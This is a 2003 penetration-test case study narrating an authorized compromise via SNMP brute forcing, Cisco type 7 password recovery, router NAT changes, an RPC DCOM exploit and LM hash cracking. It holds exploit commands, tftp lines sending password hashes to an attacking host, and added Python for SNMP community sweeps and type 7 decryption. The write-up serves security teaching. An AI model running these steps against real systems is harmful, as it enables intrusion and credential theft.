
A White Hat's Penetration Test

By Mati Aharoni

This tutorial is more of a “case study”: it describes a recent penetration test I performed. Because the test succeeded in a relatively short time, I decided to share the experience with you.

Please note that all identifying details such as IP addresses and hostnames have been changed, to protect the vulnerable and innocent.

I would like to thank my anonymous client for allowing me to write up and publish this article.

Chain of Events:
1:20 am
I sit down in front of my screen with a fresh cup of coffee. My goal is to remotely penetrate the client's network, at their request, of course. The only prior information I have is their domain name.

1:22 am
I decide to start out with a bit of DNS enumeration, in order to identify the client's gateway routers and servers and get a general idea of what kind of network they have. I use 'nslookup' to do this.

Gentoo Tools # nslookup
Note: nslookup is deprecated and may be removed from future releases.
Consider using the `dig' or `host' programs instead. Run nslookup with
the `-sil[ent]' option to prevent this message from appearing.
> set type=ns

Non-authoritative answer:
  nameserver =
  nameserver =
Authoritative answers can be found from:
  internet address =
  internet address =
> set type=mx

Address:
  mail exchanger = 10
  mail exchanger = 0


Nslookup suggests that the client's DNS records are hosted on their ISP's name servers rather than on their own, which minimizes the probability of a successful DNS zone transfer (AXFR): an ISP is far less likely to leave a name server open to transfers than a small company running its own.


I then identify the client's mail server: the MX record with preference 0 (the lowest value, so the preferred exchanger). Its name suggests that the client hosts their own mail server on site.

1:30 am
I run nmap against the mail server's address and find a variety of services running on it.

Gentoo Tools # nmap -sS

Starting nmap 3.45 ( ) at 2003-10-19 19:40 IST
Interesting ports on (
(The 1644 ports scanned but not shown below are in state: closed)
23/tcp open telnet
25/tcp open smtp
79/tcp open finger
80/tcp open http
110/tcp open pop-3
143/tcp open imap
Nmap run completed -- 1 IP address (1 host up) scanned in 26.304 seconds
Gentoo Tools #

“Strange,” I think to myself. “A mail server running the finger service?” Telnet and finger together look more like a network device than a Windows mail host, so I run a quick UDP scan for SNMP.

Gentoo Tools # nmap -sU -p 161-162

Starting nmap 3.45 ( ) at 2003-10-19 19:48 IST
Interesting ports on (
161/udp open snmp
162/udp closed snmptrap
Nmap run completed -- 1 IP address (1 host up) scanned in 2.119 seconds
Gentoo Tools #

“Hmm, SNMP is enabled... Could this be a router?” (Note that nmap of this vintage reports a UDP port as open whenever no ICMP port-unreachable comes back, so this is a hint rather than proof; the SNMP query below is what confirms it.)

A quick connection to port 23 verifies my suspicions: I immediately recognize the Cisco telnet banner.

Gentoo Tools # nc -v 23
[] 23 (telnet) open

User Access Verification

Gentoo Tools #

Apparently the public address belongs to a router that PATs (port-forwards) the SMTP, POP3, IMAP and HTTP ports to one or more internal servers.

My next step is to fingerprint the router, hoping it really is a Cisco. SNMP is the easiest way to do this, and Filip Waeytens' SNMPEnum does the job perfectly. The following is a shortened output of SNMPEnum:

Gentoo snmp # perl -w public cisco.txt

Cisco Internetwork Operating System Software
IOS (tm) Software, Version 12.0(5)T, RELEASE SOFTWARE
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Thu 23-Jul-99 13:14 by C
Gentoo snmp #

I run SNMPEnum assuming that the read-only community string is still the default “public” (SNMP is very often left this way). Fortunately for me, the guess is right. The read-write community string, however, has been changed from its default.

I whip out my favorite SNMP community string brute-force tool (the SolarWinds SNMP Dictionary Attack) and start pounding at the router with my favorite dictionary file.

After a (long) while, I see the good news I was hoping for: I finally have the read-write community string. Read-write access to a Cisco router means I can have it hand me its configuration: an SNMP set of the OLD-CISCO-SYS-MIB writeNet object (.1.3.6.1.4.1.9.2.1.55.<tftp-server-ip>) to a filename makes the router TFTP its running configuration to that host, so all my attacking machine needs is a TFTP server that is listening and reachable from the router. A quick turn with the modified “snmpbrute”, and I tftp the router configuration file straight to my attacking machine.
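
The community-string guessing above relies on a property of SNMPv1 that is worth seeing on the wire: an agent answers a GetRequest only when the community matches and stays silent otherwise, so a single GetResponse is proof of a valid string. The Python below is an added example, not the article's tools (SNMPEnum, the SolarWinds dictionary attack or snmpbrute): it hand-encodes the SNMPv1 GetRequest for sysDescr.0, decodes a GetResponse, and sweeps a candidate list against a host. The sample response it decodes offline is constructed here; its banner text is copied from the SNMPEnum output above, and no target address or community string from the original is assumed.

```python
# Added example (not the article's SNMPEnum/SolarWinds/snmpbrute): hand-encoded SNMPv1
# over UDP/161, so what a community-string sweep sends and receives is visible byte by byte.
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"   # sysDescr.0, the first object SNMPEnum reads

def ber(tag: int, payload: bytes) -> bytes:
    """BER TLV; definite length, long form when the payload exceeds 127 bytes."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload

def ber_int(value: int) -> bytes:
    """INTEGER: shortest two's-complement encoding that keeps the sign bit correct."""
    return ber(0x02, value.to_bytes(max(1, (value.bit_length() + 8) // 8), "big", signed=True))

def ber_oid(dotted: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc > 0x7F:
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))
        body.extend(reversed(chunk))
    return ber(0x06, bytes(body))

def build_message(pdu_tag: int, community: str, oid: str, value: bytes, request_id: int) -> bytes:
    """SNMPv1 message: SEQUENCE { version 0, community, PDU { id, err, idx, varbinds } }."""
    varbinds = ber(0x30, ber(0x30, ber_oid(oid) + value))
    pdu = ber(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return ber(0x30, ber_int(0) + ber(0x04, community.encode()) + pdu)

def build_get_request(community: str, oid: str = SYS_DESCR, request_id: int = 1) -> bytes:
    """GetRequest (0xA0) with a NULL value: exactly what each guess in a dictionary attack sends."""
    return build_message(0xA0, community, oid, ber(0x05, b""), request_id)

def build_get_response(community: str, oid: str, text: str, request_id: int = 1) -> bytes:
    """GetResponse (0xA2) carrying an OCTET STRING; used here only to construct offline sample data."""
    return build_message(0xA2, community, oid, ber(0x04, text.encode()), request_id)

def tlv(data: bytes, pos: int = 0):
    """Read one TLV at pos -> (tag, contents, position after it); handles long-form lengths."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length

def parse_response(data: bytes) -> dict:
    """Community, request-id, error-status and first varbind value of a GetResponse."""
    tag, msg, _ = tlv(data)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, _version, pos = tlv(msg)
    _, community, pos = tlv(msg, pos)
    tag, pdu, _ = tlv(msg, pos)
    if tag != 0xA2:
        raise ValueError("expected GetResponse, got PDU tag 0x%02x" % tag)
    _, req_id, pos = tlv(pdu)
    _, err, pos = tlv(pdu, pos)
    _, _idx, pos = tlv(pdu, pos)
    _, varbinds, _ = tlv(pdu, pos)
    _, first, _ = tlv(varbinds)
    _, _oid, pos = tlv(first)
    vtag, value, _ = tlv(first, pos)
    return {"community": community.decode("latin-1"),
            "request_id": int.from_bytes(req_id, "big", signed=True),
            "error_status": int.from_bytes(err, "big", signed=True),
            "value": value.decode("latin-1") if vtag == 0x04 else value.hex()}

def sweep_communities(host: str, candidates, port: int = 161, timeout: float = 1.0):
    """One GetRequest per candidate. SNMPv1 agents drop requests with an unknown community
    without replying (at most an authenticationFailure trap), so a timeout is a miss and
    any well-formed GetResponse with error-status 0 proves the string is accepted."""
    found = []
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        for req_id, community in enumerate(candidates, start=1):
            sock.sendto(build_get_request(community, request_id=req_id), (host, port))
            try:
                info = parse_response(sock.recvfrom(4096)[0])
            except (socket.timeout, ValueError, IndexError):
                continue                      # no answer, or not a usable GetResponse
            if info["request_id"] == req_id and info["error_status"] == 0:
                found.append((community, info["value"]))
    finally:
        sock.close()
    return found

if __name__ == "__main__":
    print("GetRequest sysDescr.0 / 'public':", build_get_request("public").hex())
    # Constructed reply, not a capture; the banner text mirrors the article's SNMPEnum output.
    sample = build_get_response("public", SYS_DESCR, "Cisco Internetwork Operating System Software")
    print(parse_response(sample))
```

A GetRequest only proves read access. Confirming a read-write string, which is what the article needed, takes a SetRequest (PDU tag 0xA3) on a harmless object, which this example deliberately leaves out. Against real devices, throttle the sweep: many agents log or trap on authentication failures, and SNMP brute forcing is noisy.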

1:55 am
Doing the “Wild Indian rain dance”. I go to the kitchen for some more coffee.

1:58 am
I start looking at the Cisco configuration file. The login (vty) and enable passwords are the same type 7 string. Type 7 is reversible obfuscation (a fixed XOR key indexed by a two-digit seed), not a hash, so a small Perl script recovers it instantly; the password turns out to be “therouter”. Had the router used “enable secret” (type 5, salted MD5) instead of “enable password”, this shortcut would not have worked.

Current configuration:
version 12.2
no service pad
enable password 7 0958460C0B0A02060E1E
transport input none
stopbits 1
line vty 0 4
password 7 0958460C0B0A02060E1E

A deeper look into the router's configuration file reveals the internal address of their mail / web server.

The following lines of the configuration are the static NAT (port forwarding) entries that map ports 143, 80, 110 and 25 on the router's outside address to the internal mail/web server:


ip nat inside source static tcp 143 143 extendable

ip nat inside source static tcp 80 80 extendable

ip nat inside source static tcp 110 110 extendable

ip nat inside source static tcp 25 25 extendable
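
Two things in the configuration did the real damage: the type 7 strings, which are reversible, and the static NAT entries, which name the internal host. The Python below is an added example, not the Perl script the article used, and the configuration it parses is constructed: the two type 7 strings are the ones printed above, the addresses are RFC 5737 documentation addresses (192.0.2.10 inside, 198.51.100.1 outside) standing in for the ones the article withheld, and the snmp-server community lines are assumed for illustration. It recovers the password, flags that the vty and enable passwords are identical, and lists which inside host each forwarded port reaches.

```python
"""Cisco type 7 password recovery and a small IOS configuration audit.

Added example; not the article's Perl script and not a real router config.
Type 7 is reversible obfuscation, not a hash: the first two characters are a
decimal seed into a fixed key, and every following hex pair is one password
byte XORed with the key byte at position (seed + i).
"""
import re

# The fixed XOR key IOS uses for 'service password-encryption' (type 7).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def type7_decrypt(enc: str) -> str:
    """Recover the plaintext of a type 7 string; ValueError on malformed input."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError("type 7 strings are an even number of chars, starting with a 2-digit seed")
    seed = int(enc[:2])
    body = bytes.fromhex(enc[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(body))
    return plain.decode("ascii")

def type7_encrypt(plain: str, seed: int = 9) -> str:
    """Inverse of type7_decrypt; shows that no secret is involved at all."""
    body = bytes(ord(c) ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, c in enumerate(plain))
    return "%02d%s" % (seed, body.hex().upper())

# Constructed sample (not the article's real config). The two type 7 strings are the
# ones the article prints; addresses are RFC 5737 documentation addresses; the
# snmp-server lines are assumed for illustration.
SAMPLE_CONFIG = """\
version 12.2
no service pad
enable password 7 0958460C0B0A02060E1E
ip nat inside source static tcp 192.0.2.10 143 198.51.100.1 143 extendable
ip nat inside source static tcp 192.0.2.10 80 198.51.100.1 80 extendable
ip nat inside source static tcp 192.0.2.10 110 198.51.100.1 110 extendable
ip nat inside source static tcp 192.0.2.10 25 198.51.100.1 25 extendable
snmp-server community public RO
snmp-server community s3cret RW
line vty 0 4
 password 7 0958460C0B0A02060E1E
 transport input telnet
"""

PW_RE = re.compile(r"^\s*(enable password|enable secret|password|secret)\s+(?:(\d)\s+)?(\S+)\s*$")
NAT_RE = re.compile(r"^ip nat inside source static (tcp|udp) (\S+) (\d+) (\S+) (\d+)")
SNMP_RE = re.compile(r"^snmp-server community (\S+)(?: (RO|RW))?")

def audit_config(text: str) -> dict:
    """Pull credentials, static port forwards and SNMP communities out of an IOS config."""
    report = {"passwords": [], "nat": [], "snmp": []}
    context = "global"
    for line in text.splitlines():
        if line and not line[0].isspace():            # unindented command: new section
            context = line.strip() if line.startswith("line ") else "global"
        m = PW_RE.match(line)
        if m:
            kind, ptype, value = m.group(1), int(m.group(2) or 0), m.group(3)
            if ptype == 0:
                plaintext = value                      # stored in the clear
            elif ptype == 7:
                plaintext = type7_decrypt(value)       # reversible, see above
            else:
                plaintext = None                       # type 5 (MD5) etc.: needs real cracking
            report["passwords"].append({"context": context, "kind": kind, "type": ptype,
                                        "value": value, "plaintext": plaintext})
            continue
        m = NAT_RE.match(line)
        if m:
            proto, in_ip, in_port, out_ip, out_port = m.groups()
            report["nat"].append({"proto": proto, "inside": in_ip, "inside_port": int(in_port),
                                  "outside": out_ip, "outside_port": int(out_port)})
            continue
        m = SNMP_RE.match(line)
        if m:
            report["snmp"].append({"community": m.group(1), "access": m.group(2) or "RO"})
    report["internal_hosts"] = sorted({n["inside"] for n in report["nat"]})
    recovered = {p["plaintext"] for p in report["passwords"] if p["plaintext"]}
    # The article's finding: the login (vty) and enable passwords are one and the same.
    report["shared_password"] = len(report["passwords"]) > 1 and len(recovered) == 1
    return report

if __name__ == "__main__":
    r = audit_config(SAMPLE_CONFIG)
    for p in r["passwords"]:
        print("%-12s %-16s type %d -> %s" % (p["context"], p["kind"], p["type"], p["plaintext"]))
    print("same password for login and enable:", r["shared_password"])
    print("internal hosts behind the router:", r["internal_hosts"])
    for n in r["nat"]:
        print("  %s/%d -> %s:%d" % (n["proto"], n["outside_port"], n["inside"], n["inside_port"]))
```

The audit deliberately treats type 5 strings as not recoverable: "enable secret" is salted MD5 and has to be cracked, which is exactly why the type 7 "enable password" in the article was the weak link.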


2:30 am
I sip my cold coffee and start profiling the information I have so far. In the background, I verify that their internal server is indeed running Windows 2000 by grabbing the HTTP and POP3 banners through the forwarded ports.

Gentoo# nc -n 80

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 29 Oct 2003 20:09:02 GMT
Content-Type: text/html
Content-Length: 87

Gentoo# nc -n 110

+OK Microsoft Exchange 2000 POP3 server version 6.0.6249.0 ( ready.


“Their internal server is most probably running Windows 2000. What are the chances that the client feels secure, thinking that they are protected by their router? What are the chances they haven't patched their internal servers against some major vulnerabilities?” I decide to give it a shot.

2:38 am
My first choice is the RPC DCOM exploit (MS03-026) against their internal server, but in order to reach it I have to add a few more static NAT entries on the router, directing the RPC and SMB ports to the internal mail / web server.

Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#ip nat inside source static tcp 139 139 extendable
Router(config)#ip nat inside source static tcp 135 135 extendable
Router(config)#ip nat inside source static tcp 445 445 extendable
Router(config)#ip nat inside source static tcp 3389 3389 extendable
Router(config)#ip nat inside source static tcp 10000 10000 extendable

Port 135, the RPC endpoint mapper, is the one the exploit itself needs. While I'm at it, I also forward the NetBIOS/SMB ports 139 and 445 (for later SMB enumeration) and Terminal Services on 3389 (I'm feeling lucky). Port 10000 is for the payload: a bind shell will listen on that port on the internal server, so the router has to forward it too, or I could never connect to my shell.

I whip out my exploit framework and fire the RPC DCOM exploit at the router's outside address, knowing that port 135 is now forwarded to the internal server by my recent NAT changes.

Gentoo # ./cli exp/msrpc_dcom1_overflow.exp payload=winbind lport=10000 OS=2K E
[*] Generating payload winbind (x86, win32, bind)...
[*] Payload generation complete (668 bytes)
[*] Using return address 0x77838eef with scratch pad at 0x7ffde0cc
[*] Connected to

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


3:01 am
Time for more coffee. My assumption paid off: this company has NOT patched their internal servers, lulled by a false sense of security behind the router. I now have SYSTEM privileges on their web / mail server.
I quickly upload pwdump4.exe in order to dump the password hashes to a file for later, offline cracking.

Once the hashes are dumped to a file, I TFTP it from their internal web server back to my attacking machine (the Windows tftp client's -i switch selects binary mode, which the executable transfer needs).

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>tftp -i my.attacking.ip GET pwdump4.exe
C:\WINNT\system32>pwdump4.exe \\ >
C:\WINNT\system32>tftp -i my.attacking.ip PUT


Usually I'd use John the Ripper to crack these password hashes, but I had recently finished generating RainbowCrack tables, so I thought I'd give them a try. The tables are LM tables (lm_alpha-numeric), which is what makes the attack so effective here: Windows 2000 still stores the LM hash alongside the NT hash, and LM upper-cases the password and hashes each 7-character half independently, which is also why the recovered passwords below are all upper case.

D:\TOOLS\password\RTGEN>rcrack.exe *.rt -f hash.txt
reading lm_alpha-numeric_0_2400x40000000_bla.rt ...
315498496 bytes read, disk access time: 17.49 s
verifying the file ...
searching for 29 hashes ...
plaintext of df168b2dd34bad07 is ***
plaintext of ac59766adf048863 is ***

plaintext found: 24 of 29 (82.76%)
total disk access time: 155.57 s
total cryptanalysis time: 428.81 s
total chain walk step: 151943227
total false alarm: 66931
total false alarm step: 56200430

username password
Administrator T3L3PITA
Anat REUVEN101


RainbowCrack proved invaluable and shortened the whole LM hash cracking run to under 10 minutes (155 s of disk access plus 429 s of cryptanalysis, per the totals above). With John the Ripper, this could have taken anywhere from a week to a couple of months.

3:30 am
Once the Administrator password is found, I attempt to connect to port 3389 on the router's outside address (forwarded to the internal server earlier), hoping that Terminal Services is enabled. Lady luck is on my side: I receive a Terminal Services logon window. Using the cracked Administrator password, I log into the web server. Mission completed.

3:37 am
To completely consolidate my control of the client's network, I upload a modified version of KaHT II (the RPC DCOM autohacker) and edit its macros.txt, so that each successful exploitation TFTPs the backup SAM file from the repair directory to my attacking machine.

At this stage, I stop my attack on the client's network, as the contract objectives are completed.

3:57 am
I take one last sip - What would I do without my coffee?

About the Author:
Visit the Security through Hacking web site for additional information.

-- SecurityProNews is an iEntry, Inc. publication --
2003 iEntry, Inc.  All Rights Reserved  Privacy Policy  Legal
